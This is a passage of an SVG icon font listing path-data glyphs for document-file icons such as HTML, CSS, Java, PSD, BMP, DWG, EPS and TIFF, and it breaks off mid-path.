<glyph unicode="&#xecde;" glyph-name="document-file-html" d="M608 544h320.183c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-320.183v-64.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-96zM576 128h-384.183c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961h384.183v64h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v64.211zM416 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM192.235 512c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM928 256v-32h-160v224h32v-192h128zM448 416v-192h32v192h64v32h-160v-32h64zM320 352v96h32v-224h-32v96h-96v-96h-32v224h32v-96h96zM656 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96z" />
<glyph unicode="&#xecdf;" glyph-name="document-file-html2" d="M608 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-415.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h415.781zM416 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM192.235 512h735.531c35.488 0 64.235-28.539 64.235-63.745v-224.511c0-34.939-28.759-63.745-64.235-63.745h-735.531c-35.488 0-64.235 28.539-64.235 63.745v224.511c0 34.939 28.759 63.745 64.235 63.745zM928 256h-128v192h-32v-224h160v32zM448 416v-192h32v192h64v32h-160v-32h64zM320 352h-96v96h-32v-224h32v96h96v-96h32v224h-32v-96zM656 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96z" />
<glyph unicode="&#xece0;" glyph-name="document-file-css" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM544 288c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006zM640.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xece1;" glyph-name="document-file-css2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM544 288l-32-0.006c0-17.795-14.312-31.994-31.967-31.994h-32.067c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-32h32c-0.102 35.364-28.668 64-64.156 64h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.37 0 64.055 28.27 64.156 64zM640.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xece2;" glyph-name="document-file-java" d="M608 544h320.183c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-320.183v-64.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-96zM576 128h-384.183c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961h384.183v64h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v64.211zM416 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM192.235 512c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM656 280l48 168h32l-64-224h-32l-64 224h32l48-168zM192 320v-31.811c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v159.811h-32v-160.295c0-17.274-14.312-31.705-31.967-31.705h-32.067c-17.801 0-31.967 14.327-31.967 32v32h-32zM512 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM447.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM896 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM831.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xece3;" glyph-name="document-file-java2" d="M608 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-415.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h415.781zM416 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM192.235 512c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM656 280l48 168h32l-64-224h-32l-64 224h32l48-168zM192 320h32v-32c0-17.673 14.165-32 31.967-32h32.067c17.655 0 31.967 14.431 31.967 31.705v160.295h32v-159.811c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v31.811zM512 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM447.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM896 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM831.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xece4;" glyph-name="document-file-psd" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM768 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM800 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xece5;" glyph-name="document-file-psd2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM768 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM800 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033z" />
<glyph unicode="&#xece6;" glyph-name="document-file-ai" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM736 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM543.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xece7;" glyph-name="document-file-ai2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM736 416h-32v32h96v-32h-32v-160h32v-32h-96v32h32v160zM608 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM543.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xece8;" glyph-name="document-file-bmp" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 328v120h95.844c35.551 0 64.156-28.654 64.156-64 0-19.21-8.367-36.327-21.641-48.015 13.274-11.727 21.641-28.878 21.641-47.985 0-35.593-28.724-64-64.156-64h-95.844v104zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM416 320v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM656 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM768 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xece9;" glyph-name="document-file-bmp2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 328v-104h95.844c35.432 0 64.156 28.407 64.156 64 0 19.107-8.366 36.258-21.641 47.985 13.273 11.687 21.641 28.805 21.641 48.015 0 35.346-28.605 64-64.156 64h-95.844v-120zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM416 320v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM656 352l-48 96h-32v-224h32v160l32-64h32l32 64v-160h32v224h-32l-48-96zM768 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecea;" glyph-name="document-file-dwg" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM720 224h-16l-48 96-48-96h-32v224h32v-160l32 64h32l32-64v160h32v-224h-16zM384 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM896 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xeceb;" glyph-name="document-file-dwg2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM720 224h16v224h-32v-160l-32 64h-32l-32-64v160h-32v-224h32l48 96 48-96h16zM384 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM896 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64z" />
<glyph unicode="&#xecec;" glyph-name="document-file-eps" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM416 320v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96zM576 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xeced;" glyph-name="document-file-eps2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM416 320h96v32h-96v64h128v32h-160v-224h160v32h-128v64zM576 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xecee;" glyph-name="document-file-tiff" d="M608 544h320.236c52.918 0 95.764-42.963 95.764-95.961v-224.078c0-53.009-42.875-95.961-95.764-95.961h-320.236v-64.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-96zM576 128h-320.236c-52.918 0-95.764 42.963-95.764 95.961v224.078c0 53.009 42.875 95.961 95.764 95.961h320.236v64h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v64.211zM416 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM256.115 512c-35.41 0-64.115-28.806-64.115-63.745v-224.511c0-35.205 28.472-63.745 64.115-63.745h671.77c35.41 0 64.115 28.806 64.115 63.745v224.511c0 35.205-28.472 63.745-64.115 63.745h-671.77zM320 416v-192h32v192h64v32h-160v-32h64zM480 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608 352v64h128v32h-160v-224h32v96h96v32h-96zM800 352v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xecef;" glyph-name="document-file-tiff2" d="M608 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-351.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h351.781zM416 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM256.115 512h671.77c35.643 0 64.115-28.539 64.115-63.745v-224.511c0-34.939-28.705-63.745-64.115-63.745h-671.77c-35.643 0-64.115 28.539-64.115 63.745v224.511c0 34.939 28.705 63.745 64.115 63.745zM320 416v-192h32v192h64v32h-160v-32h64zM480 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32zM608 352v64h128v32h-160v-224h32v96h96v32h-96zM800 352v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xecf0;" glyph-name="document-file-ots" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 